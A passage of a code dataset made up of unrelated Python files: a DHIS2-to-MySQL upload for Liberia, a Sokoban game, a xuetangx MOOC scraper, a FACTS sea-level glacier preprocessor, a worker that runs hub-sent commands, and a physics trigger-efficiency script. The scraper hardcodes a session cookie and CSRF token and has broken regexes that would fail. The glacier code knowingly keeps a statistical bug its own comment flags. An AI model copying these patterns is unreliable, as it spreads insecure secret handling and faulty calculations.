dict(itertools.zip_longest(*[iter(orgUnitsUrl_list)] * 2, fillvalue=\"\"))\n\n return orgUnits\n\n# Haiti will need to add an extra level (wards)\norgUnits = pull_orgs(orgUnitsUrl, \"level=4\")\ndistricts = pull_orgs(orgUnitsUrl, \"level=3\")\ncounties = pull_orgs(orgUnitsUrl, \"level=2\")\ncountries = pull_orgs(orgUnitsUrl, \"level=1\")\n\n#########################\n# Map Facility Ancestors\n#########################\n\n#Map out the parent relations of each facility\nrelationsurl = base_url + \"/organisationUnits\"\nrelationships = {}\n\nfor key in orgUnits.keys():\n #pull out information for key\n relations = requests.get(relationsurl + \"/\" + key, auth = authorization)\n relations = json.loads(relations.text)\n\n #only want ID\n ancestors = str(relations['ancestors'])\n ancestors = re.findall(r' \\'(.*?)\\'}', ancestors)\n\n #Create dictionary\n relationships[key]=' '.join(ancestors)\n\n\n##################################\n# Pull out Indicator Groups\n##################################\n# Each indicator is part of a program (Indicator Groups)\n# We pull out the indicator groups and use these groups to pull out indicators\n\n# Base URL\nindicatorGroupsUrl = base_url + \"/indicatorGroups?paging=False\"\n\n# Request and load into json\nelements = requests.get(indicatorGroupsUrl, auth = authorization)\nelements = json.loads(elements.text)\n\n\n# Iterate and append id and and displayname\nindicatorGroups_list = []\nfor e in elements['indicatorGroups']:\n for key, value in e.items():\n indicatorGroups_list.append(value)\n\n# Convert to dictionary to easily pull in and out. Can just use keys for params\nindicatorGroups = dict(itertools.zip_longest(*[iter(indicatorGroups_list)] * 2, fillvalue=\"\"))\n\n\n# MySQL tables will be named after Indicator Groups\n# Replace names with names amenable to MySQL\nfor key, value in indicatorGroups.items():\n value = value.replace(\"-\",\"_\")\n value = value.replace(\" \", \"_\")\n value = value.replace(\"__\",\"_\")\n value = re.sub(r\"[?|$|\\.|!|\\(|\\)]\", \"\", value)\n indicatorGroups[key] = value\n\n\n##################################\n# Create list of Indicators\n##################################\nindicatorsUrl = base_url + \"/indicators?paging=False\"\n\n#request and load into json\nelements = requests.get(indicatorsUrl, auth = authorization)\nelements = json.loads(elements.text)\n\n\n#iterate and append id and and displayname\nindicators_list = []\nfor e in elements['indicators']:\n for key, value in e.items():\n indicators_list.append(value)\n\n#Convert to dictionary to easily pull in and out. Can just use keys for params\nindicators = dict(itertools.zip_longest(*[iter(indicators_list)] * 2, fillvalue=\"\"))\n\n\n###############################\n# Prepare request queries\n###############################\n# Base URL and set base dimensions\ndimensions_base = \"dx:IN_GROUP-\"\nbase =base_url + \"/analytics\"\n\n# CAT organisation units\norgs = \"ou:\"\nfor unit in orgUnits.keys():\n orgs = orgs + unit + \";\"\n\norgs = orgs[:-1]\n\n############################################################################\n# Define Functions to pull relevant data and upload\n############################################################################\n#Pull all relevant data from API\ndef pull_data(dimensions_base, indicator_group, base, time_period, orgs):\n\n\n dimensions = dimensions_base + indicator_group\n params = dict(\n dimension = [dimensions, time_period, orgs])\n\n r = requests.get(base, params = params,\n auth = authorization)\n\n data = json.loads(r.text)\n\n #Check the columns names from their email and replace with those\n data = pd.DataFrame(data['rows'], columns = [\"indicator\",\"date\", \"facility\", \"value\"])\n data['ID'] = indicator_group\n\n #map on org units relationships - with org unit dictionaries\n data['temp'] = data['facility']\n data = data.replace({\"temp\":relationships})\n data[\"country\"], data[\"counties\"], data[\"district\"] = data['temp'].str.split(\" \", 1).str\n data.drop('temp', axis =1, inplace = True)\n\n #Replace codes with english names\n data = (data.replace({\"indicator\":indicators, \"facility\":orgUnits,\n \"ID\":indicatorGroups,\n \"country\":countries,\n \"county\":counties,\n \"district\":districts}))\n\n data['date'] = pd.to_datetime(data['date'], format = '%Y%m')\n\n return data\n\n\n\n#function checks if a table exists and if not then create it\ndef create_table(data, indicator_group):\n #read in table name from indicator groups list\n table_name = indicatorGroups.get(indicator_group).lower()\n\n #identify whether a table exists\n check_table_query = (\"SHOW TABLES LIKE '\" + table_name + \"'\")\n cursor.execute(check_table_query)\n\n #if table has value then the table exists in the database\n exists = False\n for table in cursor:\n exists = True if len(table) > 0 else False\n print(table_name + \" Exists in MySQL Database already\")\n\n #If exists is true then remove the last 12 months of data from table\n if exists == True:\n year_ago = datetime.date.today() - datetime.timedelta(365)\n year_ago = year_ago.replace(day = 1)\n\n drop_12_months_query = (\"delete from \" + table_name + \" where date >= %s;\")\n cursor.execute(drop_12_months_query, (year_ago,))\n con.commit()\n\n #Otherwise create a new table\n elif exists == False: ##Errors around here may be due to oddly named indicator groups\n create_table_query = (\"Create table \" + table_name + \"\"\" (\n ID varchar(50) not null,\n Country varchar(50) not null,\n County varchar(100) not null,\n District varchar(100) not null,\n Facility varchar(125) not null,\n Indicator varchar(200) not null,\n Date date not null,\n Value numeric(25,2) not null);\"\"\")\n\n cursor.execute(create_table_query)\n con.commit()\n\n #Upload data to server\n data.to_sql(con = engine, name = table_name, if_exists = \"append\", index = False)\n\n\n############################################################################\n# Run File\n############################################################################\ndef main(indicator_group):\n data = pull_data(dimensions_base, indicator_group, base, period, orgs)\n create_table(data, indicator_group)\n\n###Establish MySQL connection\ncon = mysql.connector.connect(user = sql_user, password = sql_pw, database = sql_db)\ncursor = con.cursor()\n#MySQL is deprecated in current pandas - need to manually create sql engine\nengine = create_engine(\"mysql+pymysql://\" +sql_user + \":\" + sql_pw + \"@localhost/\" + sql_db)\n\n#loop through all indicator groups\nfor key in indicatorGroups:\n main(key)\n pprint(indicatorGroups.get(key).lower())\n\ncursor.close()\ncon.close()\n","sub_path":"weekly-dhis-upload-liberia.py","file_name":"weekly-dhis-upload-liberia.py","file_ext":"py","file_size_in_byte":9544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"166753670","text":"# from random import randint\nprint(\" Sang trái : a --------- \", end = \"\")\nprint(\" Sang phải : d \")\nprint(\" Lên trên : w --------- \", end = \"\")\nprint(\" Xuống dưới : s \")\nprint(\"P là Payer \")\nprint(\"B là Boxes\")\nprint(\"D là Destinations\")\n\nmap = {\n \"size_x\": 5,\n \"size_y\": 5\n}\n\nplayer = { \n \"x\": 3, \n \"y\": 4 \n}\n\nboxes = [\n { \"x\": 1, \"y\": 1},\n { \"x\": 2, \"y\": 2},\n { \"x\": 3, \"y\": 3}\n]\ndestinations = [\n { \"x\": 2, \"y\": 1},\n { \"x\": 3, \"y\": 2},\n { \"x\": 4, \"y\": 3}\n]\nplaying = True\nwhile playing:\n for y in range(map['size_y']) :\n for x in range(map['size_x']):\n\n player_is_here = False\n if x == player['x'] and y == player['y']:\n player_is_here = True\n\n box_is_here = False\n for box in boxes:\n if box['x'] == x and box['y'] == y and player_is_here is not True :\n box_is_here = True\n break\n \n destinations_is_here = False\n for des in destinations:\n if des['x'] == x and des['y'] == y and player_is_here is not True :\n destinations_is_here = True\n break\n\n if player_is_here :\n print(\" P \", end = \"\")\n elif box_is_here :\n print(\" B \", end = \"\")\n elif destinations_is_here :\n print(\" D \", end = \"\")\n else:\n print(\" - \", end = \"\") \n print()\n\n move = input(\" Your move: \").upper()\n\n dx = 0\n dy = 0\n\n if move == \"W\":\n dy -= 1 \n\n elif move == \"S\":\n dy += 1\n\n elif move == \"A\":\n dx -= 1\n \n elif move == \"D\":\n dx += 1\n \n else:\n print(\"Buzzzz\")\n playing = False\n\n check_box = True\n if 0 <= player['x'] + dx < map['size_x'] and 0 <= player['y'] + dy < map['size_y']:\n player['x'] += dx\n player['y'] += dy\n\n for box in boxes:\n if 0 <= box['x'] + dx < map['size_x'] and 0 <= box['y'] + dy < map['size_y']: \n \n if box['x'] == player['x'] and box['y'] == player['y']: \n box['x'] += dx\n box['y'] += dy\n check_box = False\n break\n \n win = True\n for box in boxes:\n if box not in destinations:\n win = False\n if win:\n print(\" ****** * * * * Your Win !!!!!! ** ** * * * *\")\n break \n \n\n \n \n\n\n \n \n \n ","sub_path":"Session05/sokoban.py","file_name":"sokoban.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"401669263","text":"#!/usr/bin/python\r\n#coding=utf-8\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom requests import Session\r\nimport urllib2\r\nimport urllib\r\nimport mimetypes\r\nimport os\r\nimport time\r\nimport re\r\n\r\nmooc_login = 'http://www.xuetangx.com/v2/login_ajax'\r\nmooc_mainwindow = 'http://www.xuetangx.com/dashboard'\r\nmooc_course = 'http://www.xuetangx.com'\r\ncourse_url = []\r\ncourse_num = 0\r\n\r\nssid = ''#用户名\r\nkey = ''#密码\r\n\r\ndef addHTTP(str) :\r\n\t'补全路径'\r\n\tif (str[:4] != 'http') : str = 'http://' + str\r\n\treturn str\r\n\r\n#登陆\r\ns = Session()\r\nuserInfo = {'username' : ssid, 'password' : key, 'remember' : 'true', 'csrfmiddlewaretoken' : '3wgo7O0Abz0sGsPDKkToxUypEkifDis4'}\r\n\r\nheader = {\r\n'Accept':'*/*',\r\n'Accept-Encoding':'gzip, deflate',\r\n'Accept-Language':'zh-CN,zh;q=0.8',\r\n'Connection':'keep-alive',\r\n'Content-Length':'114',\r\n'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',\r\n'Cookie':'video_player_volume_level=54; hide_captions=true; Hm_lvt_32d56203d9a79a16a032531755dad60e=1437532428,1437552515,1437612130,1438765178; ajs_anonymous_id=%22694d3836-743c-42aa-885f-bd611ec7e543%22; sessionid=b4d386a777bb86d49a0b8a26491ce8ac; ajs_group_id=null; ajs_user_id=null; frontendUserTrack=29585; frontendUserReferrer=http://www.xuetangx.com/; sequence=9; csrftoken=3wgo7O0Abz0sGsPDKkToxUypEkifDis4',\r\n'Host':'www.xuetangx.com',\r\n'Origin':'http://www.xuetangx.com',\r\n'Referer':'http://www.xuetangx.com/',\r\n'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36',\r\n'X-CSRFToken':'3wgo7O0Abz0sGsPDKkToxUypEkifDis4',\r\n'X-Requested-With':'XMLHttpRequest'\r\n}\r\n\r\nloginSession = s.post(mooc_login, userInfo, headers = header, verify = True)\r\ndashboard = s.get(mooc_mainwindow)\r\nsoup = BeautifulSoup(dashboard.text, \"html.parser\")\r\n#print soup\r\n\r\n#进入主界面\r\n######################################################################\r\n\r\ncourselist = soup.find_all(\"a\", \"enter-course\")\r\n#print courselist\r\n#for course in courselist:\r\ncourse = courselist[0];\r\ntemp = str(course)\r\nfindurl = re.match(r'.*', temp, re.M | re.I)\r\n#print type(findurl)\r\ncourse_url.append(mooc_course + findurl.group(1))\r\ncourse_num += 1\r\n#print course_url[0]\r\n\r\ncourseboard1 = s.get(course_url[0])\r\nsoup_course1 = BeautifulSoup(courseboard1.text, \"html.parser\")\r\ncourse1_menu = soup_course1.find(\"ol\", \"course-tabs\");\r\n#print course1_menu\r\nentervideolist = course1_menu.find(\"a\")\r\nmatch_videolisturl = re.match(r'.*', str(entervideolist), re.M | re.I)\r\nvideolisturl = match_videolisturl.group(1)\r\n\r\nvideoboard = s.get(mooc_course + videolisturl)\r\nvideosoup = BeautifulSoup(videoboard.text, \"html.parser\")\r\ncurrentvideo = mooc_course + re.match(r'.*',\r\n\t\t\t\t\t\tstr(videosoup.find(\"section\", id=\"course-content\").find(\"a\")), \r\n\t\t\t\t\t\tre.M | re.I).group(1)\r\n#currentvideo_info = {'event_type' : 'play_video', 'page' : currentvideo, 'event' : }","sub_path":"webcrawler/mooc.py","file_name":"mooc.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"345550743","text":"# GMSLR projection program used for IPCC WG1 AR5\n# Translated from IDL to Python 2.7 by Jonathan Gregory 23.10.19\n# Adapted for use in FACTS by Gregory Garner 20 November 2019\n\nimport os\nimport argparse\nimport pickle\nimport fnmatch\nimport re\nfrom netCDF4 import Dataset\nfrom import_data import *\nfrom filter_data import filter_data\nfrom Smooth import Smooth\nimport numpy as np\n\n\n\nclass ProjectionError(Exception):\n\tpass\n\t\n\t\n\t\ndef endofhistory():\n\treturn 2014\n\t\n\n\ndef tas_limit_filter(tasdict, temp_target, temp_target_window=0.25, ref_syear=1850, ref_eyear=1900):\n\t\n\t# Initialize a running list of models and scenarios to include in the analysis\n\tout_dict = {}\n\t\n\t# Determine which indices are in our reference average window\n\tref_idx = np.flatnonzero(np.logical_and(tasdict[\"years\"] >= ref_syear, tasdict[\"years\"] <= ref_eyear))\n\t\n\t# Extract the temperature data from the reference period and produce the average\n\tref_tas = np.mean(tasdict['data'][:,ref_idx], axis=1)\n\t\n\t# Smooth the temperature data over the 19 year window\n\ttas_smoothed = np.apply_along_axis(Smooth, axis=1, arr=tasdict[\"data\"], w=19)\n\t\n\t# Find the tas value to test for the temperature target\n\ttas_test = tas_smoothed[:,-1]\n\t#tas_test = np.nanmax(tas_smoothed, axis=1)\n\n\t# Get the indices where the 2100 temperature falls within the temperature limit window\n\tmatch_idx = np.flatnonzero(np.logical_and(tas_test >= temp_target - temp_target_window, tas_test <= temp_target + temp_target_window))\n\t\n\t# Subset the original tasdict for the matched indices\n\tout_dict[\"ensemble\"] = tasdict[\"ensemble\"][match_idx]\n\tout_dict[\"GCM\"] = tasdict[\"GCM\"][match_idx]\n\tout_dict[\"scenario\"] = tasdict[\"scenario\"][match_idx]\n\tout_dict[\"years\"] = tasdict[\"years\"]\n\tout_dict[\"data\"] = tasdict[\"data\"][match_idx,:]\n\n\t# Return the output dictionary\n\treturn(out_dict)\n\n\n\n\ndef ar5_preprocess_glaciersfair(scenario, startyr, pipeline_id):\n\t\n\t# Define the temperature input file name\n\tinfilename = \"CLIMATE_FORCING_1850.csv\"\n\tinfile = os.path.join(os.path.dirname(__file__), infilename)\n\t\n\t# Acceptable SSP scenarios\n\tssp_scenarios = ['ssp585', 'ssp370', 'ssp245', 'ssp126', 'ssp119']\n\t\n\t# Import the temperature data\n\ttemp_data = import_data(infile)\n\t\n\t# Test the provided scenario\n\tscenario_test = re.search(\"^tlim(\\d*\\.?\\d+)win(\\d*\\.?\\d+)$\", scenario)\n\tif(scenario_test):\n\t\t\n\t\t# This is a temperature limit, so extract the limit from the scenario string\n\t\ttemp_target = float(scenario_test.group(1))\n\t\ttemp_target_window = float(scenario_test.group(2))\n\t\t\n\t\t# Produce a list of models and scenarios that match the criteria\n\t\ttemp_data_filtered = tas_limit_filter(temp_data, temp_target, temp_target_window)\n\t\t\n\telif(scenario in ssp_scenarios):\n\t\t\n\t\t# Filter the temperature data for this particular scenario\n\t\ttemp_data_filtered = filter_data(temp_data, ensemble=\"FAIR\", scenario=scenario.upper())\n\t\n\telse:\n\t\t\n\t\t# This is an invalid scenario\n\t\traise Exception(\"Invalid scenario definition: {}\".format(scenario))\n\t\n\t# The module is calibrated to use the temperature reference period for AR5, so center\n\t# the temperature data to the mean of that period\n\tref_idx = np.flatnonzero(np.logical_and(temp_data_filtered[\"years\"] >= 1986, temp_data_filtered[\"years\"] <= 2005))\n\tref_tas = np.nanmean(temp_data_filtered[\"data\"][:,ref_idx], axis=1)\n\ttemp_data_filtered[\"data\"] = temp_data_filtered[\"data\"] - ref_tas[:,np.newaxis]\n\t\n\t# Find the mean and sd of the matched models/scenarios\n\ttemp_mean = np.nanmean(temp_data_filtered['data'], axis=0)\n\ttemp_sd = np.nanstd(temp_data_filtered['data'], axis=0)\n\tdata_years = temp_data_filtered['years']\n\t\n\t# Find which year in the data years is the start year\n\tbaseyear_idx = np.flatnonzero(data_years == startyr)\n\n\t# Integrate temperature to obtain K yr at ends of calendar years\n\t# Note - The original code I believe performs a cumulative sum of the standard\n\t# deviations, which is not correct. Below I provide a fix to that bug as well as\n\t# a replication of the bug for diagnostic purposes.\n\tinttemp_mean = np.cumsum(temp_mean)\n\t#inttemp_sd = np.sqrt(np.cumsum(temp_sd**2)) # Assume independence across models\n\tinttemp_sd = np.cumsum(temp_sd) # Assume correlation\n\t\n\t# Integrated quantities must be centered on the baseline year\n\tinttemp_mean -= inttemp_mean[baseyear_idx]\n\tinttemp_sd -= inttemp_sd[baseyear_idx]\n\t\t\n\t# Store preprocessed data in pickles\n\toutput = {'temp_mean': temp_mean, 'temp_sd': temp_sd, 'inttemp_mean': inttemp_mean, \\\n\t\t\t\t'inttemp_sd': inttemp_sd, 'data_years': data_years, 'startyr': startyr, \\\n\t\t\t\t'scenario': scenario}\n\t\n\t# Write the configuration to a file\n\toutdir = os.path.dirname(__file__)\n\toutfile = open(os.path.join(outdir, \"{}_data.pkl\".format(pipeline_id)), 'wb')\n\tpickle.dump(output, outfile)\n\toutfile.close()\n\n\treturn(0)\n\n\n\ndef ar5_preprocess_glaciersfair_full(scenario, startyr, pipeline_id):\n\t\n\t# Acceptable SSP scenarios\n\tssp_scenarios = ['ssp585', 'ssp370', 'ssp245', 'ssp126', 'ssp119']\n\t\n\t# Test the provided scenario\n\tscenario_test = re.search(\"^tlim(\\d*\\.?\\d+)win(\\d*\\.?\\d+)$\", scenario)\n\tif(scenario_test):\n\t\t\n\t\t# THIS SCENARIO HAS NOT BEEN IMPLEMENTED YET\n\t\traise Exception(\"Scenario \\\"{}\\\" has not been implemented yet\".format(scenario))\n\t\t\n\t\t# This is a temperature limit, so extract the limit from the scenario string\n\t\ttemp_target = float(scenario_test.group(1))\n\t\ttemp_target_window = float(scenario_test.group(2))\n\t\t\n\t\t# Produce a list of models and scenarios that match the criteria\n\t\ttemp_data_filtered = tas_limit_filter(temp_data, temp_target, temp_target_window)\n\t\t\n\telif(scenario in ssp_scenarios):\n\t\t\n\t\t# Define the temperature input file name\n\t\tinfilename = \"FAIR_{}.nc\".format(scenario)\n\t\tinfile = os.path.join(os.path.dirname(__file__), infilename)\n\t\t\n\t\t# Load the data set for this scenario\n\t\tnc = Dataset(infile, 'r')\n\t\ttemp_years = nc.variables['years'][:]\n\t\ttemp_data = nc.variables['gmst'][:,:]\n\t\tnc.close()\n\t\t\n\t\t# Filter the temperature data for this particular scenario\n\t\ttemp_data_filtered = {\"years\": temp_years, \"data\": temp_data.T}\n\t\n\telse:\n\t\t\n\t\t# This is an invalid scenario\n\t\traise Exception(\"Invalid scenario definition: {}\".format(scenario))\n\t\n\t# The module is calibrated to use the temperature reference period for AR5, so center\n\t# the temperature data to the mean of that period\n\tref_idx = np.flatnonzero(np.logical_and(temp_data_filtered[\"years\"] >= 1986, temp_data_filtered[\"years\"] <= 2005))\n\tref_tas = np.nanmean(temp_data_filtered[\"data\"][:,ref_idx], axis=1)\n\ttemp_data_filtered[\"data\"] = temp_data_filtered[\"data\"] - ref_tas[:,np.newaxis]\n\t\n\t# Find the mean and sd of the matched models/scenarios\n\ttemp_mean = np.nanmean(temp_data_filtered['data'], axis=0)\n\ttemp_sd = np.nanstd(temp_data_filtered['data'], axis=0)\n\tdata_years = temp_data_filtered['years']\n\t\n\t# Find which year in the data years is the start year\n\tbaseyear_idx = np.flatnonzero(data_years == startyr)\n\n\t# Integrate temperature to obtain K yr at ends of calendar years\n\t# Note - The original code I believe performs a cumulative sum of the standard\n\t# deviations, which is not correct. Below I provide a fix to that bug as well as\n\t# a replication of the bug for diagnostic purposes.\n\tinttemp_mean = np.cumsum(temp_mean)\n\t#inttemp_sd = np.sqrt(np.cumsum(temp_sd**2)) # Assume independence across models\n\tinttemp_sd = np.cumsum(temp_sd) # Assume correlation\n\t\n\t# Integrated quantities must be centered on the baseline year\n\tinttemp_mean -= inttemp_mean[baseyear_idx]\n\tinttemp_sd -= inttemp_sd[baseyear_idx]\n\t\t\n\t# Store preprocessed data in pickles\n\toutput = {'temp_mean': temp_mean, 'temp_sd': temp_sd, 'inttemp_mean': inttemp_mean, \\\n\t\t\t\t'inttemp_sd': inttemp_sd, 'data_years': data_years, 'startyr': startyr, \\\n\t\t\t\t'scenario': scenario}\n\t\n\t# Write the configuration to a file\n\toutdir = os.path.dirname(__file__)\n\toutfile = open(os.path.join(outdir, \"{}_data.pkl\".format(pipeline_id)), 'wb')\n\tpickle.dump(output, outfile)\n\toutfile.close()\n\n\treturn(0)\n\n\n\nif __name__ == '__main__':\n\t\n\t# Initialize the command-line argument parser\n\tparser = argparse.ArgumentParser(description=\"Run the glaciers pre-processing stage for the AR5 Global SLR projection workflow\",\\\n\tepilog=\"Note: This is meant to be run as part of the Framework for the Assessment of Changes To Sea-level (FACTS)\")\n\t\n\t# Define the command line arguments to be expected\n\tparser.add_argument('--scenario', help=\"SSP scenario (i.e. ssp585) or temperature target (i.e. tlim2.0win0.25)\", default='ssp585')\n\tparser.add_argument('--pipeline_id', help=\"Unique identifier for this instance of the module\")\n\tparser.add_argument('--startyear', help=\"Year from which to start integrating temperature [default=2005]\", type=int, default=2005)\n\tparser.add_argument('--fullFAIR', help=\"Run the full set of FAIR temperature trajectories [default=1, use full set] [0, use 500 member subset]\", type=int, choices=[0,1], default=1)\n\t\n\t# Parse the arguments\n\targs = parser.parse_args()\n\t\n\t# Run the preprocessing stage with the provided arguments\n\tif(args.fullFAIR == 1):\n\t\tar5_preprocess_glaciersfair_full(args.scenario, args.startyear, args.pipeline_id)\n\telse:\n\t\tar5_preprocess_glaciersfair(args.scenario, args.startyear, args.pipeline_id)\n\t\n\texit()","sub_path":"modules/ar5/glaciersfair/ar5_preprocess_glaciersfair.py","file_name":"ar5_preprocess_glaciersfair.py","file_ext":"py","file_size_in_byte":9134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"357863922","text":"import socket\nimport json\n\nimport Brick\nimport Worker\n\nwaitfor = None\n\ndef Parse(conn, message):\n\tglobal waitfor\n\n\tif Brick.DEBUG and message:\n\t\tprint(\"\\033[0;36mrecv\\033[0m> \\033[0;33m%s\\033[0m\" % (message))\n\n\t\"\"\"General problems\"\"\"\n\tif message == 'access denied':\n\t\tprint(\"\\033[1;31mAccess denied.\\033[0m\")\n\t\treturn None\n\telif message == 'request invalid':\n\t\tprint(\"\\033[1;33mInvalid request.\\033[0m\")\n\t\treturn None\n\telif message == 'no actions':\n\t\tprint(\"\\033[1;33mNo actions.\\033[0m\")\n\t\treturn None\n\telif message == 'False' or message == 'True' or message == 'None':\n\t\treturn None\n\n\tif not message:\n\t\t\"\"\"Authorize after fresh connection\"\"\"\n\t\twaitfor = 'auth_response'\n\t\treturn \"auth slave %s imslave!\" % (socket.gethostname())\n\n\telse:\n\t\tif waitfor == 'auth_response':\n\t\t\tdata = message.split(' ')\n\n\t\t\twaitfor = None\n\t\t\tif data[0] == 'ok':\n\t\t\t\tprint(\"Connected to \\033[0;36m%s\\033[0m \\033[0;33m%s\\033[0m at %s:%s\" % (data[1], data[2], Brick.TCP_IP, Brick.TCP_PORT))\n\t\t\t\treturn 'task get'\n\t\t\telif message == 'fail':\n\t\t\t\tprint(\"\\033[1;33mAuthorization failed!\\033[0m\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\t\"\"\"We're not waiting for something specific?\"\"\"\n\t\t\t\"\"\"Assume it's json going from Hub\"\"\"\n\n\t\t\tdata = json.loads(message)\n\t\t\tif 'tasklist' in data:\n\t\t\t\tif Worker.isFree():\n\t\t\t\t\treturn 'task get'\n\t\t\t\telse:\n\t\t\t\t\treturn 'fail'\n\t\t\telif 'task' in data:\n\t\t\t\tprint(\"Starting task \\033[0;36m%s\\033[0m\" % data['task']['name'])\n\t\t\t\tconn.send('task started\\n')\n\t\t\t\tret = Worker.start_task(conn, data['task']['cmd'])\n\n\treturn None\n","sub_path":"slave/Request.py","file_name":"Request.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"297792564","text":"from __future__ import print_function, division\nimport gzip\nimport json\nimport os\n\nimport uproot\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom coffea import hist\nfrom coffea.util import load, save\n\nimport pickle\nimport gzip\nimport math\n\nimport argparse\n#import processmap\n#from hists_map import *\n\nplt.rcParams.update({\n 'font.size': 14,\n 'axes.titlesize': 18,\n 'axes.labelsize': 18,\n 'xtick.labelsize': 12,\n 'ytick.labelsize': 12,\n 'text.usetex': False,\n })\n\nfill_opts = {\n 'edgecolor': (0,0,0,0.3),\n 'alpha': 0.8\n }\nerr_opts = {\n #'linestyle':'-',\n 'marker': '.',\n 'markersize': 10.,\n 'color':'k',\n 'elinewidth': 1,\n 'emarker': '-'\n }\n\nchanlist = [\"hadhad\", \"hadel\", \"hadmu\"]\nhistnames = {\n 'hadhad': \"trigeff_m\",\n 'hadel': \"trigeff_m\",\n 'hadmu': \"trigeff_m\",\n}\nvarcuts_data = {\n \"hadhad\": {\"region\": \"hadhad_signal_0\", \"trig_pass_ref\": [0.5, 1.5]},\n \"hadel\": {\"region\": \"hadel_signal_0\", \"trig_pass_ref\": [0.5, 1.5], \"jet_msd\": [40.,None]},\n \"hadmu\": {\"region\": \"hadmu_signal_0\", \"trig_pass_ref\": [0.5, 1.5], \"jet_msd\": [40.,None]},\n}\nvarcuts_mc = {\n \"hadhad\": {\"region\": \"hadhad_signal_0\", \"trig_pass_ref\": [0.5, 1.5]},\n \"hadel\": {\"region\": \"hadel_signal_0\", \"trig_pass_ref\": [0.5, 1.5], \"jet_msd\": [40.,None]},\n \"hadmu\": {\"region\": \"hadmu_signal_0\", \"trig_pass_ref\": [0.5, 1.5], \"jet_msd\": [40.,None]},\n}\nvar1names = {\n \"hadhad\": \"jet_pt\",\n \"hadel\": \"jet_pt\",\n \"hadmu\": \"jet_pt\",\n}\nvar1labels = {\n \"hadhad\": \"$p_{T}(jet)$\",\n \"hadel\": \"$p_{T}(jet)$\",\n \"hadmu\": \"$p_{T}(jet)$\",\n}\nrebin1 = {\n \"hadhad\": [200.,250.,300.,350.,400.,450.,500.,550.,600.,650.,950.],\n \"hadel\": [200.,250.,300.,350.,400.,500.,950.],\n \"hadmu\": [200.,250.,300.,350.,400.,500.,950.],\n}\nvar2names = {\n \"hadhad\": \"jet_msd\",\n \"hadel\": \"lep_pt\",\n \"hadmu\": \"lep_pt\",\n}\nvar2labels = {\n \"hadhad\": \"$m_{SD}(jet)$\",\n \"hadel\": \"$p_{T}(e)$\",\n \"hadmu\": \"$p_{T}(\\mu)$\",\n}\nrebin2 = {\n \"hadhad\": [0.,10.,20.,30.,40.,50.,60.,70.,80.,90.,100.],\n \"hadel\": [20.,32.,44.,56.,68.,92.,116.,140.],\n \"hadmu\": [20.,32.,44.,56.,68.,92.,116.,140.],\n}\nnumsels = {\n \"hadhad\": {\"trig_pass\": [0.5, 1.5]},\n \"hadel\": {\"trig_pass\": [0.5, 1.5]},\n \"hadmu\": {\"trig_pass\": [0.5, 1.5]},\n}\n\n#overflow_behavior = 'all'\noverflow_behavior = 'over'\n\ndef getTrigEff(h,var1_name,var2_name,vars_cut,num_sel,rebins1,rebins2):\n#def drawTrigEff(h,var1_name,var1_label,var2_name,var2_label,vars_cut,num_sel,plot_title,plot_label):\n print(h)\n #print(h.values())\n exceptions = [var1_name,var2_name,'dataset']\n for var,val in vars_cut.items():\n exceptions.append(var)\n for var,val in num_sel.items():\n exceptions.append(var)\n print(exceptions)\n x = h.sum(*[ax for ax in h.axes() if ax.name not in exceptions],overflow='all')\n if var1_name in num_sel.keys() or var2_name in num_sel.keys():\n print(\"%s and %s cannot be a variable in numerator selection\"%(var1_name,var2_name))\n return\n for var,val in vars_cut.items():\n if var!=var1_name and var!=var2_name:\n print('integrating ',var,val[0],val[1])\n if (len(val)==2):\n x = x.integrate(var,slice(val[0],val[1]))#,overflow=overflow_behavior)\n elif(type(val) is str):\n x = x.integrate(var,val)#,overflow=overflow_behavior)\n elif(len(val)==1):\n x = x.integrate(var,val[0])#,overflow=overflow_behavior)\n x_num = x.copy()\n #x_num = x_num.sum(*[ax for ax in x_num.axes() if ax.name in num_sel],overflow='all') #same axes as numerator\n #x_num.clear()\n\n xlist = []\n for var,val in num_sel.items():\n if var!=var1_name and var!=var2_name:\n print('integrating ',var,val)\n print(var,val)\n if (len(val)==2):\n #xlist.append(x.integrate(var,slice(val[0],val[1])))#,overflow=overflow_behavior))\n x_num = x_num.integrate(var,slice(val[0],val[1]))#,overflow=overflow_behavior))\n elif(len(val)==1):\n #xlist.append(x.integrate(var,val[0]))#,overflow=overflow_behavior))\n x_num = x_num.integrate(var,val[0])#,overflow=overflow_behavior))\n #for xadd in xlist:\n # x_num.add(xadd)\n x = x.sum(*[ax for ax in x.axes() if ax.name in num_sel],overflow='none')\n\n #print(x.values())\n #print(x_num.values())\n\n x = x.sum(*[\"dataset\"],overflow='allnan')\n x_num = x_num.sum(*[\"dataset\"],overflow='allnan')\n\n #x = x.rebin(var1_name, hist.Bin(var1_name+\"_new\", var1_name+\"_new\", rebins1))\n #x = x.rebin(var2_name, hist.Bin(var2_name+\"_new\", var2_name+\"_new\", rebins2))\n #x_num = x_num.rebin(var1_name, hist.Bin(var1_name+\"_new\", var1_name+\"_new\", rebins1))\n #x_num = x_num.rebin(var2_name, hist.Bin(var2_name+\"_new\", var2_name+\"_new\", rebins2))\n x = x.rebin(var1_name, hist.Bin(var1_name, var1_name, rebins1))\n x = x.rebin(var2_name, hist.Bin(var2_name, var2_name, rebins2))\n x_num = x_num.rebin(var1_name, hist.Bin(var1_name, var1_name, rebins1))\n x_num = x_num.rebin(var2_name, hist.Bin(var2_name, var2_name, rebins2))\n\n x_bins = x.axis(var1_name).edges()\n y_bins = x.axis(var2_name).edges()\n\n den_arr = np.array(x.values(overflow='all')[()])\n num_arr = np.array(x_num.values(overflow='all')[()])\n\n if ([ax.name for ax in 